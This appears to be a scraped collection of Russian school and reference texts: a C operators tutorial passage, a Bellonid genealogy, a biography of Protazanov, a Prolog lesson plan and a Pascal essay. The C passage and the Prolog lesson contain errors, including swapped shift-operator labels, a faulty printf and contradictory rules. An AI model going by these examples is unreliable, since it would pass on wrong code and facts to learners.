Оператор присваивания выполняется справа налево. В языке Си возможно использования выражений с несколькими операторами присваивания, например, допустимо использовать следующее выражение
с=b=5*(a=5*45);
Оно выполняется в следующем порядке: вычисляется значение 5*45, результат присваивается переменной ‘а’, затем эта переменная умножается на 5 и результат присваивается переменной ‘b’, и далее присваивается переменной ‘c’.
Помимо традиционной операции присваивания в языке Си существуют дополнительные операции: +=, –=, *= и т.п. Например, операции слева и справа в приведенной ниже таблице идентичны
a=a+10;
a+=10;
a=a/10;
a/=10;
a=a&64;
a&=10;
a=a>>1;
a>>=1;
Достоинства этих операции – они выполняются быстрее, чем операции с обычным присваиванием.
4.3.1.Пример 4.1
Пример использования арифметических операций и операций присваивания:
Листинг 4.1
#include <stdio.h>
void main()
{
int a=25,b=3,с,d;
float x=25.,y=3,z;
c=a/b;
d=a%b;
printf(“Деление целых чисел: %d\nОстаток: %d\n”,c,d);
z=x/y;
printf(“Деление вещественных чисел: %d %d\n”,c,d);
a=a+10;
y=y*3;
printf(“Традиционная форма операции присваивания: %d %f\n”,a,y);
a+=10;
y*=3;
printf(“Присваивание со сложение и умножением: %d %f”,a,y);
}
Результат выполнения программы:
Деление целых чисел: 8
остаток: 1
Деление вещественных чисел: 8.333333
Традиционная форма операции присваивания: 35 9.000000
Присваивание со сложение/умножением: 45 27.000000
4.4. Операции отношения
Эти операции позволяют сравнивать друг с другом данные, например:
x>0 y<=x z!=27 g==’\n’
Значения переменных после выполнения операции сравнения не изменяется, каждое выражения проверяется – истинно оно или ложно. В языке Си истинному значению выражения с операцией отношения соответствует единичный результат, ложному – нулевой. Например, выражение
y=x>5;
определяет значение переменной ‘у’ равным единице для ‘x’ равным 25 и равным нулю для ‘х’ равным –5.
Согласно табл. 4.1. наибольшим приоритетом обладает операции ‘<’ и ‘>’, наименьшими равенство и неравенство. Поэтому, например, выражение
(x>5 == y<10)
будет выполняться в следующем порядке:
– сравнение y<10;
– сравнение x>5;
– сравнение на равенство.
4.5. Логические операции
В языке Си отсутствуют данные типа булева переменная, но существуют логические операции, в которых можно использовать данные типа символ или целое в любой модификации. При этом подразумевается, что нулевое значение выражения соответствует значению «FALSE» (ложь), а любое другое – значению «TRUE» (истина). Эти операции: логическое умножение && (операция И), сложение || (операция ИЛИ) и отрицание ! (операция НЕ). Результат выполнения этих операций для различных значений целых переменных a и b приведен в табл. 4.2.
Таблица 4.2.
Значение
переменной a
Значение
переменной b
Результат
a&&b
a||b
!a
!b
ноль
ноль
0
0
1
1
ноль
отлично от ноля
0
1
1
0
отлично от ноля
ноль
0
1
0
1
отлично от ноля
отлично от ноля
1
1
0
0
Следует отметить, что «истинным» значением переменной считается не только ее положительное значение, но и отрицательное. Если выражение при выполнении логической операции является «истиной», то результату присваивается значение единица, в противном случае – нулевое значение.
4.5.1. Пример 4.2
Листинг 4.2
#include <stdio.h>
void main()
{
int x=5,y=-3;
printf(“x&&y x||y !x !y x>3 y>0\n”);
printf(“%3d %3d %3d %3d %3d %3d”,x&&y,x||y, !x, !y,x>3,y>-10);
}
Результатом исполнения программы будут строки на экране
x&&y x||y !x !y x>3 y>0
1 1 0 0 1 0
Согласно табл. 4.1. наибольшим приоритетом среди логических операций обладает операция НЕ. Поэтому, например, оператор
z=a&&b||!c&&d;
будет выполняться в следующем порядке:
– операция НЕ переменной c;
– операция И операндов a и b;
– операция И операндов (!c) и d;
– операция ИЛИ операндов (a&&b) и (!c&&d).
Логические операции можно использовать и для реализации сложных неравенств. Например, для составления условия 10<x<20 в языке Си необходимо записать логическое выражение (x>10 && x<20), а математическое выражение x<10x>20 можно представить в виде (x<10 || x>20).
4.6. Битовые операции
Эти операции позволяют выполнять проверку и изменение отдельных битов в данных целого и символьного типов. Их нельзя использовать для вещественных чисел. Действие битовых операций идентично логическим, но они выполняются над каждым битом данных.
Каждая из битовых операций служит определенным целям. Например, операция & (И) полезна для проверки единичных значений отдельных битов числа, а также для установки определенных битов в «0». Операция | (ИЛИ) полезна для установки в «1» битов. Операция ^ (Исключающее ИЛИ) используется для проверки несовпадения битов. Операции сдвига << и >> позволяют сдвинуть все биты числа влево/вправо на заданное количество разрядов. Недостающие значения битов дополняются нулями, информация в исчезающих битах теряется.
Примеры использования битовых операций приведены в табл. 4.3. Все переменные a, b, z этой таблицы типа unsigned char. Язык Си не умеет работать с данными в двоичном формате, но для упрощения понимания работы каждое число представлено в двоичном формате (например, для первой строки a=20210=110010102, b=15510=100110112).
Таблица 4.3.
Операция
1 операнд
2 операнд
Результат
Комментарий
НЕ
a=11001010
b=10011011
z=~a=00110101
z=~b=01100100
Инвертируются все биты числа
И
a=10011010
b=11110000
z=a&b=10010000
На число a накладывается маска (число b) – выделяются значения 4 старших битов числа а, младшие биты обнуляются
ИЛИ
a=10011010
b=00001111
z=a|b=10011111
Четыре младших бита числа a устанавливаются в единичное состояние, старшие биты остаются без изменения
Исключающее ИЛИ
a=10011010
b=00001111
z=a^b=10010101
Старшие биты числа a остаются без изменения, младшие – инвертируются
Сдвиг вправо
a=10011010
b=00001111
z=a<<1=00110100
z=b<<3=01111000
Выполняется сдвиг вправо всех битов числа a на один разряд, числа b – на три разряда. Происходит потеря старших битов, установленных в «1»
Сдвиг влево
a=10011010
b=00001111
z=a>>2=00100110
z=b>>1=00000111
Выполняется сдвиг влево всех битов числа a на два разряда, числа b – на один разряд. Происходит потеря младших битов, установленных в «1»
Следует отметить, что результатом исполнения битовой операции в отличии от логических операций будет число типа символ или целое, а не логические «0» или «1». Так, например, исполнение выражений b=a&&8 и b=a&8 при различных значениях переменной а даст такой результат:
Значение переменной а
Результат для b=a&&8
Результат для b=a&8
0
0
0
8
1
8
16
0
0
255
0
8
4.7. Операции инкрементирования и декрементирования
Во всех языках программирования очень часто используются операции увеличения и уменьшения значения переменных на единицу – операции инкрементирования и декрементирования. В языке Си существуют две специальные формы записи: ++ и ––, например,
x++;
y--;
Операции
x=x+1; x+=1; x++;
идентичны друг другу. Различие состоит в том, что последний вариант записи исполняется быстрее.
Каждая из рассмотренных операций имеет две формы записи – префиксную и постфиксную, например, для переменной ‘x’ увеличение ее значения на единицу можно записать двумя способами: x++ или ++x. Разница в выполнении будет в случае использования инкремента в составе более сложных выражений, например, после выполнения операторов
x=10;
y=x++;
значение переменных будут следующие x=11, y=10 (постфиксная форма предполагает вначале использование значения переменной ‘x’, а затем увеличение его на единицу). Но после выполнения операторов
x=10;
y=++x;
значение переменных будут такие x=11, y=11 (префиксная форма предполагает вначале увеличение значения переменной ‘x’ на единицу, а затем его использование).
4.8. Операции вычисления размера объекта и преобразования типа данных
Часто требуется учитывать, сколько занимают те или иные переменные в памяти. Для этого используется оператор sizeof. Для этого оператора существует две формы записи: sizeof (<тип данных>) и sizeof (<выражение>). Результатом выполнения оператора будет целое число – размер в байтах занимаемый указанным типом данных или переменной.
4.8.1. Пример 4.3
Листинг 4.3
#include <stdio.h>
void main()
{
int a,b,c,d;
float x;
double y;
a=sizeof(char);
b=sizeof(unsigned long);
c=sizeof(x);
d=sizeof(y);
printf(“a=%d b=%d c=%d d=%d”,a,b,c,d);
}
Исполнением программы для версии языка ТС-2.0 будет следующий результат:
a=1 b=4 с=4 d=8
В предыдущем разделе уже рассматривалась операция преобразования типа. Для выполнения этой операции используются ключевые слова стандартных типов данных, взятые в круглые скобки. Например, при выполнении операторов
int x=2, y=5;
float z;
z=y/x;
результатом является значение z=2. Для того чтобы получить точное значение отношения целых чисел ‘x’ и ‘y’ необходимо выполнить операцию преобразования типа
z=(float)y/x;
после этого будет z=2.5.
2 |
https://doc4web.ru/istoriya/bellonidi.html | Беллониды | https://doc4web.ru/uploads/files/129/9c913086050ea9687077f9d9f8e56ce9.docx | files/9c913086050ea9687077f9d9f8e56ce9.docx | План
Введение
1 История
2 Генеалогия
Список литературы
Введение
Беллониды (кат. Bel·lònides[1]; исп. Bellónidas; фр. Bellonides) — знатный род готского происхождения, владения которого располагались в Лангедоке. Первоначально владения дома располагались около Каркассона. Согласно средневековым генеалогиям Беллониды были предками Барселонского дома, представители которого были правителями ряда Каталонских графств, а позже стали королями Арагона, однако в настоящее время эта версия подвергается сомнению.
1. История
Родоначальником дома считается Белло (Беллон) (ум.812). По его имени род и получил в современной историографии название Беллониды. Его существование является дискуссионным[2]. Считается, что Белло имел готское происхождение и был родом из Конфлана. Император Карл Великий, проводя политику назначения правителями пограничных графств на юге Франкской империи представителей готской знати, назначил графом Каркассона Белло.
Дискуссионным является и количество детей Белло. Точно его сыновьями считаются бездетный Гислафред I (ум. ок. 821), наследовавший отцу в Каркассоне, и Олиба I (ум.837), который унаследовал Каркассон после смерти брата. Также Олиба владел графством Разе. Дискуссионным является то, были ли сыновьями Белло родоначальник Барселонского дома Сунифред I (ум. 848)[3] и родоначальник графов Ампурьяса и Руссильона Сунийе I (ум. ок. 848)[4].
При сыновьях Олибы I род разделился на 2 ветви. В старшей ветви, идущей от Олибы II (ум. ок. 879), в итоге закрепились графства Каркассон и Роде. После смерти младшего сына Олибы II, Акфреда II (ум. ок. 934), графства унаследовала его дочь Арсинда, вышедшая замуж за графа Комменжа и Кузерана Арно I, потомки которого и унаследовали все владения. Младший сын Олибы II, Акфред I (ум. 906), женился на Арсинде, дочери Бернара Плантвелю, маркиза Готии и маркграфа Аквитании. В результате в 918 году после смерти брата Арсинды, герцога Аквитании Гильома I Благочестивого, не оставившего детей, его наследниками стали сыновья Акфреда, Гильом II Молодой (ум. 926) и Акфред (ум. 927), последовательно владевшие герцогством Аквитания. Ветвь угасла со смертью Бернара III, графа Оверни.
2. Генеалогия
Белло (Беллон) (ум. 812), граф Каркассона
Гислафред I (ум. ок. 821), граф Каркассона с 812
Олиба I (ум. 837), граф Каркассона и Разе с ок. 821; 1-я жена: Эльметруда; 2-я жена: Рикуильда
Олиба II (ум. ок. 879), граф Каркассона и Разе 865—872, 872—875
Бенсио (ум. 908), граф Каркассона и Разе с 906
Акфред II (ум. ок. 934), граф Каркассона и Разе с 908
Арсинда (ум. после 959), графиня Каркассона и Разе; муж: с ок. 925/935 Арно I де Комменж (ум. ок. 957), граф де Комменж и де Кузеран
Сунифред, аббат Ла Грасса
Акфред I (ум. 906), граф Каркассона и Разе с 877; жена: Аделинда, дочь Бернара Плантвелю, маркиза Готии и маркграфа Аквитании
Гильом II Молодой (ум. 926), герцог Аквитании, граф Оверни и Макона с 918
Акфред (ум. 927), герцог Аквитании, граф Оверни и Макона с 926
Бернар III (ум. после 932), граф Оверни
Этьен
Бернар
Эрмизенда (ум. 860); муж: Сунифред I (ум. 848), граф Барселоны, Урхеля и Сердани[3]
Ротауда де Разе; муж: Аларик де Бланшфор
(?) Сунийе I (ум. ок. 848), граф Ампурьяса и Руссильона, родоначальник графов Ампурьяса и Руссильона[4]
Список литературы:
l’Enciclopèdia. Enciclopèdia Catalana. (каталан.).
Некоторые историки сомневаются в его существовании, не найдя доказательств его существования в современных ему документах.
В средневековых генеалогиях традиционно считался сыном Белло, однако ряд современных исследователей считают его сыном графа Осоны Борреля.
В средневековых генеалогиях традиционно считался сыном Белло, однако некоторые современные исследователи сомневаются в этом.
Источник: http://ru.wikipedia.org/wiki/Беллониды |
https://doc4web.ru/istoricheskie-lichnosti/protazanov.html | Протазанов | https://doc4web.ru/uploads/files/231/51bb1845ed41c31506d5c7f5cc976e61.docx | files/51bb1845ed41c31506d5c7f5cc976e61.docx | Яков Протазанов
(1881-1945)
Яков Александрович Протазанов родился в 1881 году, в Москве, в мещанской среде. Окончил Московское коммерческое училище Работа служащего конторы его не увлекала, поэтому, получив небольшое наследство, он уезжает за границу путешествовать и в Париже посещает студию "Патэ". И все же приход Протазанова в кино (1907) внешне выглядел поступком случайным, даже легкомысленным. Родные и друзья знали, что молодого человека увлекает карьера инженера. Поступив переводчиком в московскую кинофирму "Глория", будущий режиссер, возможно, и сам считал этот шаг случайным эпизодом, продиктованным скорее любопытством к новому виду искусства, который уже в ту пору величали "чудом XX века". Тем не менее, испробовав несколько профессий, Протазанов пробует себя в качестве сценариста. Любовь к литературе, поэзии помогла ему довольно скоро обратить на себя внимание серьезностью трактовок. И вот он уже режиссер. До эмиграции (1920) Протазанов снял около 80 фильмов. Имя его получает широкую известность. В череде киноподенщины ему удается создать несколько картин, ставших для своего времени настоящими кинооткрытиями, отмеченных актуальностью проблематики, изобразительностью режиссуры, художественным вкусом и смелостью в поисках построения кадра, мизансцены и законов монтажа, Следование за идейным смыслом литературного источника сочетается у него с пытливой работой по выявлению средствами кино художественной фактуры произведения Протазанов открыл для экрана ряд выдающихся актерских имен: И. Мозжухин, О. Гзовская, В. Орлова, П. Бакшеев и др. Будучи горячим поклонником Художественного театра, режиссер не скрывает в своем творчестве ориентации на метод прославленного коллектива. Прежде всего это ощущается в тщательной психологической разработке характера и мотивов его поведения, что, в свою очередь, заставляет режиссера выбирать темы для своих картин по принципу их общественной значимости. Отсюда интерес Протазанова к серьезной литературе, к классике. "Война и мир" (1915, совместно. с В. Гардиным), "Николай Ставрогин" ("Бесы", 1915), "Пиковая дама" (1916), "Семейное счастье" по А Толстому (1916), "Андрей Кожухов" по Степняку-Кравчинскому (1917). В 1918 г. Протазанов ставит одну из лучших своих картин "Отец Сергий" с постоянным и любимым актером И. Мозжухиным в главной роли. Этому фильму суждено было достойно венчать конец важного периода как в становлении русского кино, так и в биографии самого режиссера. Шедевр Протазанова, не утративший и сегодня своего художественного впечатления, убедительно доказывал, что в лице Протазанова мировой кинематограф приобрел одного из выдающихся мастеров набиравшего силу экранного искусства, тонкого и самобытного художника. Поэтому, оказавшись за рубежом (Париж, Берлин), русский мэтр получает приглашения лучших киностудий, где и снимает шесть картин Творчество режиссера в эти годы не прошло бесследно для его французских и немецких коллег, можно смело говорить о влиянии его искусства на творческий рост этих кинематографий (особенно немецкой). В 1923 году Протазанов, поддавшись на уговоры руководителя студии "Русь" М. Н. Алейникова, возвращается на родину и сразу же приступает к съемкам "Аэлиты". Он пристально приглядывается к новому для него миру, к советскому быту, он осторожен в выборе тем, однако именно в 20-е годы расцвел во всем блеске его талант комедиографа "Закройщик из Торжка" (1925), "Процесс о трех миллионах"
(1926), "Дон Диего и Пелагея" (1927), "Праздник св. Йоргена" (1930)-в этих комедиях сочетаются лукавая усмешка и сатирическая оценка, тонкий лиризм и непосредственность интонации. И снова, как прежде, открытие актерских имен И. Ильинский, А. Кторов, М. Климов, В Марецкая, М. Жаров, Н Баталов, А. Войцик, позже Н. Алисова Комедии Протазанова, обрастая зрительскими легендами, надолго стали частью общественного сознания
Связав свою творческую судьбу со студией "Межрабпом-Русь" (позже "Межрабпомфильм"), режиссер благодаря своему авторитету становится бесспорным лидером этого киноколлектива Вокруг него образуется молодая группа последователей, которых можно назвать "протазановской школой" Ю. Райзман, Я. Уринов, С Комаров, А Роу, отчасти К. Эггерт Не избежал влияния мастера и Вс. Пудовкин 20-е годы, самый яркий и плодотворный период в творчестве зрелого мастера, завершились для него и окончательным выбором своего жанра По замыслу режиссера, он должен был стать в его планах доминирующим. Уже в фильме «Марионетки» (1934) он успешно доказал, что кинопамфлет, достаточно редкий на экране, не только актуален, но и сулит оригинальные возможности в раскрытии средствами кино острых политических вопросов.
К сожалению, политическая обстановка в стране, сложившаяся в 30-е годы, не позволила Протазанову развить начатое Он обращается к классике и ставит картину "Бесприданница" по пьесе А. Островского (1936) Отмеченная несомненным художественным вкусом, чарующей операторской работой М Магидсона, великолепным актерским ансамблем, имевшая в прокате огромный зрительский успех, эта постановка явилась по существу последней значительной работой большого мастера
Культурный, опытный режиссер с мировым именем так и не вписался в новые условия советской действительности. И последнее десятилетие его жизни превратилось в тоскливую, мучительную дорогу к забвению.
Фильмы: 1912: Анфиса, Уход великого старца; 1914: Драма у телефона; 1915: Сашка-семинарист, Война и мир (совм. с В. Р. Гардиным), Николай Ставрогин (Бесы); 1916: Пляска смерти, Пиковая дама, Семейное счастье, Женщина с кинжалом; 1917: Сатана ликующий, Андрей Кожухов; 1918: Малютка Элли, Отец Сергий; 1921: Ночь любви (Франция); 1922: Тень греха (Франция); 1923: Паломничество любви (Германия); 1924: Аэлита; 1925: Его призыв, Закройщик из Торжка; 1926: Процесс о трех миллионах; 1927: Сорок первый, Дон Диего и Пелагея; 1928: Белый орел; 1930: Праздник св. Йоргена; 1931: Томми; 1934: Марионетки; 1936: О странностях любви, Бесприданница; 1940: Салават Юлаев. |
https://doc4web.ru/informatika/yazik-programmirovaniya-prolog.html | Язык программирования Пролог | https://doc4web.ru/uploads/files/165/57646b911efa4a099cf003cd10391b15.docx | files/57646b911efa4a099cf003cd10391b15.docx | Урок в 9 классе
по теме «Язык программирования Пролог»
(последнее занятие).
Цели урока:
Образовательная: повторить понятия факт, правило и запрос для логического программирования и применение знаний в решении задач.
Развивающая: развитие структуры системы мыслительных процессов (анализ, сравнение, выделение главного), дедуктивный и индуктивный подход в решении задач.
Воспитательная: развитие у школьников умения слушать друг друга, анализировать ответы и делать вывод.
Ход урока.
1. Интеллектуальные способности
На доске записаны интеллектуальные способности.
Подумайте, знаете ли вы, что они означают? Которые вы можете определить?
Ребята, давайте, определим, что они означают:
анализ
синтез
сравнение
обобщение
выделение существенного
индуктивный метод
дедуктивный методы
Используем ли мы с вами эти интеллектуальные способности?
Вот сегодня мы это и проверим. Для этого решим задачу с использованием знаний полученных на уроке химия.
А какую тему мы с вами изучаем на уроке информатики? (язык программирования Пролог)
Как тогда можно сформулировать тему сегодняшнего урока?
2. Задача по химии.
Ребята, посмотрите, пожалуйста, на доску.
Что здесь записано?
Правильно, это химических формулы веществ. Итак, что за вещества представлены в виде формул:
H2S04 – серная кислота (купоросное масло)
HCl – соляная кислота кислоты
H3PO4 – фосфорная кислота
NaOH – гидроксид натрия (едкий натр)
Ca(OH)2 – гидроксид кальция (гашеная известь) щелочи
Ba(OH)2 – гидроксид бария (баритова вода)
На какие группы делятся эти вещества? (кислоты и щелочи)
Какой из интеллектуальных способностей мы с вами использовали? (синтез)
Из каких элементов периодической системы Менделеева состоят эти вещества? (металл, неметалл, водород и кислород)
Какой из интеллектуальных способностей мы с вами использовали? (анализ)
Что общего между этими веществами? (у всех есть водород)
Какой элемент есть почти у всех? (кислород, кроме соляной кислоты)
Какой из интеллектуальных способностей мы с вами использовали? (сравнение, обобщение, выделение существенного)
А каким методом мы пользовались? (дедуктивным методом)
3. База знаний
а) факты
А теперь вспомним базу знаний Пролог.
Из каких групп состоит база знаний? (факты, правила, запрос или цель)
Что содержит факт? (имя, аргументы)
На доске написаны факты прочитайте их пожалуйста. Что здесь является именем, а что аргументом?
Содержит (купоросное масло, H, 2, О, 4).
Содержит (соляная кислота, Н, 1, О, 0).
Содержит (фосфорная кислота, Н, 3, О, 4).
Содержит (едкий натр, Н, 1, О, 1).
Содержит (гашеная известь, Н, 2, О, 2).
Содержит (баритова вода, Н, 2, О, 2).
Какой интеллектуальным методом необходимо воспользоваться, чтобы составить факт? (дедуктивный метод)
б) правила
Следующее у нас правила. Из каких частей состоит правило? (голова и тело)
Голова правила – это новый факт, содержащий переменную вместо аргумента.
Тело правила – имеющийся факт, содержащий переменную используемую в голове правила.
Для составления правил давайте, определим, что объединяет кислоты и щелочи (у щелочи количество водорода и кислорода одинаковое).
Давайте сначала, проговорим правила для кислоты. Вещество –кислота, если вещество содержит водорода и кислорода одинаковое количество.
Попробуйте составить правило для кислоты у себя в тетрадях. А теперь кто попробует написать правила на доске.
Щелочь (X):- содержит(X ,H ,a ,O ,b), a=b.
Кислота (Y):- содержит(Y ,H ,a ,O ,b), a\=b.
Какой интеллектуальным методом необходимо воспользоваться, чтобы составить факт? (индуктивный метод)
в) запрос (цель)
Следующее запрос. С какого знака начинается запрос?
Какие слова пишутся после знака «?»?
В чем отличие запроса от факта? (содержит знак «?» и переменные)
Я диктую запрос на естественном языке, а вы должны написать на языке Пролог.
Является ли купоросное масло кислотой?
? Кислота (купоросное масло).
Является ли едкий калий щелочью?
? Щелочь (едкий калий)
Сколько кислорода и водорода содержит баритова вода?
? Содержит (гидроксид бария, Н, Z, О, X).
Какой элемент содержит 2 водорода и 4 кислорода?
? Содержит (X, Н, 2, О, 4).
4. Вывод.
Давайте, определим, когда и какие интеллектуальные способности мы использовали (анализ и синтез, дедуктивный метод – составление фактов; обобщение, сравнение и выделение существенного, индуктивный метод – составление правил).
Итак, давайте дадим определения этим интеллектуальным способностям:
анализ – процесс расчленения целого на части.
синтез – процесс воссоединения целого из частей.
сравнение – уметь находить общее и отличное во всех изучаемых явлениях.
обобщение – уметь выделять и объединять общие существенные черты изучаемых явлений и предметов.
выделение существенного – уметь выделить главное и сделать вывод.
индуктивный метод – движение знания от частного к общему.
дедуктивный методы - движение знания от общего к частному.
Все эти интеллектуальные способности может выполнять и компьютер, но без помощи человека это невозможно, потому что их вкладывает в компьютер человек. Также у человека есть наблюдательность, гибкость и критичность мышления, чего нет у компьютера. Но сейчас ученые работают над проблемой искусственного интеллекта, т.е. сделать мышление компьютера похожим на человеческое.
5. Самостоятельная работа (15 мин).
А теперь небольшая самостоятельная работа. Задания на карточках.
Вариант №1
База знаний содержит информацию о двух племенах Мульти и Пульти, говорящих соответственно на языках мули и пули:
Вождь (Стрела, мульти).
Вождь (Клык, пульти).
Воин (Чун, мульти).
Воин (Луч, мульти).
Воин (Гроза, мульти).
Воин (Чан, пульти).
Воин (Лань, пульти).
Воин (Гром, пульти).
Знает (Стрела, пули).
Знает (Чун, пули).
Знает (Лань, мули).
Сформулировать правило: Вождь объединенного племени, являющийся воином племени Мульти и знающий оба языка.
Сформулируйте на языке Пролог запрос: кто знает язык мули.
Если в базе знаний поместили правило:
представитель (X) :- знает (X, пули), воин(X, мульти).
Каким будет ответ на запрос:
?представитель (X)
Вариант №2
База знаний содержит информацию о двух племенах Мульти и Пульти, говорящих соответственно на языках мули и пули:
Вождь (Стрела, мульти).
Вождь (Клык, пульти).
Воин (Чун, мульти).
Воин (Луч, мульти).
Воин (Гроза, мульти).
Воин (Чан, пульти).
Воин (Лань, пульти).
Воин (Гром, пульти).
Знает (Стрела, пули).
Знает (Чун, пули).
Знает (Лань, мули).
Сформулировать правило: Соплеменники среди войнов.
Сформулируйте на языке Пролог запрос: кто вождь племени Пульти.
Если в базе знаний поместили правило:
представитель (X) :- воин (X,пульти), знает (X,мули).
Каким будет ответ на запрос:
?представитель (X).
6. Заключение.
Итак, а все - таки как бы вы назвали тему сегодняшнего урока?
Давайте запишем ее в тетради. На этом урок закончен, спасибо, что вы что – то взяли из этого урока. |
https://doc4web.ru/informatika/yazik-programmirovaniya-paskal-i-vetvlenie.html | Язык программирования Паскаль и ветвление | https://doc4web.ru/uploads/files/185/f3e582aa35e66f009c266b3f18fbca99.docx | files/f3e582aa35e66f009c266b3f18fbca99.docx | Введение.
Язык Паскаль был создан как учебный язык программирования в 1968 –1971г. Никлаусом Виртом. В настоящее время этот язык имеет более широкую сферу применения, чем предусматривалось при его создании. Целью работы Вирта было создание языка, который:
Строился бы на небольшом количестве базовых понятий;
Имел бы простой синтаксис;
Допускал бы перевод программ в машинный код простым компилятором;
Все эти качества сделали язык очень популярным и удобным для применения в школе.
Знакомясь с языком Паскаль я выбрал для своей работы конструкцию ветвления как наиболее распространённую и интересную.
Цель моей работы – изучить конструкцию ветвления и её применение в языке программирования Паскаль. Исходя из этого я поставил следующие задачи:
Изучить литературу по данной теме.
Составить план своей работы.
Изучить алгоритмическую конструкцию ветвления.
Рассмотреть её применение в Паскале.
Научиться решать задачи с Ветвлением.
Составить пакет заданий по теме “Ветвление в Паскале”.
I. Ветвление в алгоритмах.
Блок – схемы и словесное описание ветвлений.
1.1 Основные этапы решения задач на компьютере.
Процесс решения задач на компьютере – это совместная деятельность человека и ЭВМ. Этот процесс можно представить виде нескольких последовательных этапов. На долю человека приходятся этапы, связанные с творческой деятельностью – постановкой, алгоритмизацией, программированием задач анализом результатов, а на долю компьютера - этапы обработки информации с соответствии с разработанным алгоритмом.
Первый этап – постановка задачи. На этом этапе участвует человек, хорошо представляющий предметную область задачи. Он должен чётко определить цель задачи, дать словесное описание содержания задачи и предложить общий подход к её решению. Для вычисления суммы двух целых чисел человек, знающий, как складываются числа, может описать задачу следующим образом: ввести два целых числа, сложить их и вывести сумму в качестве результата решения задачи.
Второй этап – математическое и информационное моделирование. Цель этого этапа – создать такую математическую модель решаемой задачи, которая может быть реализована в компьютере. Существует целый ряд задач, где математическая постановка сводится к простому перечислению формул и логических условий. Этот этап тесно связан с первым этапом, и его можно отдельно не рассматривать, однако возможно, что для полученной модели известны несколько методов решения, и тогда предстоит выбрать лучший.
Для вышеописанной задачи данный этап сведётся к следующему: введённые в компьютер числа запомним в памяти под именами А и В, затем вычислим значение этих чисел по формуле А+В, и результат запомним в памяти под именем Summa.
Третий этап – алгоритмизация задачи. На основе математического описания необходимо разработать алгоритм решения.
Четвёртый этап – программирование. Программой называется план действий, подлежащий выполнению некоторым исполнителем, в качестве которого может выступать компьютер. Составление программы обеспечивает возможность выполнение алгоритма и соответственно поставленной задачи исполнителем – компьютером. Во многих задачах при программирование на алгоритмическом языке часто пользуются заменой блока алгоритма на один или несколько операторов, введением новых блоков, замена одних блоков на другими.
Пятый этап – ввод программы и исходных данных в ЭВМ. Программа и исходные данные вводятся в ЭВМ с клавиатуры с помощью редакторов текстов, и для постоянного хранения осуществляется их запись на гибкий или жёсткий магнитный диск.
Шестой этап – тестирование и отладка программы. На этом этапе происходит исполнение алгоритма с помощью ЭВМ, поиск и исключение ошибок. При этом программисту приходится выполнять рутинную работу по проверке работы программы, поиску и исключению ошибок, и поэтому для сложных программ этот этап часто требует гораздо больше времени и сил, чем написание первоначального текста программы.
Отладка программы – сложный и нестандартный процесс. Исходный план отладки заключается в том, чтобы оттестировать программу на контрольных примерах.
Контрольные примеры стремятся выбрать так, чтобы при работе с ними программа прошла все основные пути блок – схемы алгоритма, поскольку на каждом из путей могут быть свои ошибки, а детализация плана зависит от того, как поведёт себя программа на этих примерах: на одном может зациклиться (т.е. бесконечно повторять одно и то же действие); на другом – дать явно неверный или бессмысленный результат и т.д. Сложные программы отлаживаются отдельными фрагментами.
Для повышения качества выполнения этого этапа используются специальные программы – отладчики, которые позволяют исполнить программу “по шагам” с наблюдением за изменением значений переменных, выражений и других объектов программы, с отслеживанием выполняемых операторов.
Седьмой этап – исполнение отлаженной программы и анализ результатов. На этом этапе программист запускает программу и задаёт исходные данные, требуемые по условию задачи.
Полученные в результате решения выходные данные анализируются постановщиком задачи, и на основе этого анализа вырабатываются соответствующие решения, рекомендации, выводы. Например, если при решение задачи на компьютере результат сложения двух чисел 2 и 3 будет 4, то следует сделать вывод о том, что надо изменить алгоритм и программу.
Возможно, что по итогам анализа результатов потребуется пересмотр самого подхода к решению задачи и возврат к первому этапу для повторного выполнения всех этапов с учётом приобретённого опыта. Таким образом, в процессе создания программы некоторые этапы будут повторяться до тех пор, пока мы получи алгоритм и программу, удовлетворяющие показанным выше свойствам.
1.2 Алгоритм.
Слово алгоритм происходит от algorithmic – латинской формы написания имени латинского математика IX в. Аль-Хорезми, который сформулировал правила выполнения четырёх арифметических действий над многозадачными числами. В дальнейшем алгоритм стали называть описание любой последовательности действий, которую следует выполнить для решения заданной задачи.
Алгоритм может быть ориентирован на исполнение его человеком или автоматическим устройством. Алгоритмы, предназначены для выполнения компьютерами, обычно называют компьютерными программами или просто программами.
Алгоритмом называется точное предписание, определяющее последовательность действий исполнителя, направленных на решение поставленной задачи. В роли исполнителя алгоритмов могут выступать люди, роботы, компьютеры.
Используются разные способы записи алгоритмов. Широко распространенный словесный способ записи: это записи рецептов приготовления различных блюд в кулинарной книге, инструкции по использованию технических устройств, правила правописания и многие другие. Наглядно представляется алгоритм языком блок-схем.
Например алгоритм решения задачи вычисления суммы двух чисел на языке блок-схем будет записан, как показано на рисунке:
Начало
А, В
А+В=С
С
Свойства алгоритма. При составлении алгоритма необходимо обеспечить, чтобы он обладал рядом свойств.
Однозначность алгоритма, под которой понимается единственность толкования исполнителем правил выполнения действий и порядка их выполнения. Чтобы алгоритм обладал этим свойством, он должен быть записан командами из системы команд исполнителя.
Для нашего примера исполнитель алгоритма должен понимать такую запись действий, как сложность числа А и В.
Конечность алгоритма – обязательность завершения каждого из действий, составляющих алгоритм, и завершимость выполнения каждого алгоритма в целом. Записанный на рисунке алгоритм обладает этим свойством, так как запись действий исполнителя завершается записью об окончании алгоритма.
Результативность алгоритма, предполагающая, что выполнение алгоритма должно завершится получением определенных результатов. Алгоритм в нашем примере обладает этим свойством, так как для целых чисел А и В всегда будет вычислена сумма.
Массовость, т.е. возможность применения данного алгоритма для решения целого класса задач, отвечающих общей постановки задачи. Так как алгоритм, показанный на рисунке, позволяет правильно подсчитать сумму не только чисел 2 и 3, но любой другой пары целых чисел, он обладает свойством массовости. Для того чтобы алгоритм обладал свойством массивности, следует составлять алгоритм, используя обозначения величин и избегая конкректных значений.
Правильность алгоритма, под которой понимается способность алгоритма давать правильные результаты решения поставленных задач. Представленный в примере алгоритм обладает свойством правильности, так как в нём использована правильная формула сложения целых чисел, и для любой пары целых чисел результат выполнения алгоритма будет равен их сумме.
Компьютерная программа – это план будущих работ, составленный в расчёте на его выполнение компьютером.
Чтобы компьютер смог выполнить программу, она должна быть записана в специальной форме, доступной компьютеру; должна быть записана в соответствии со специальным набором правил.
Набор записи компьютерной программы называется “алгоритмическим языком”.
1.2.1 Линейные алгоритмы.
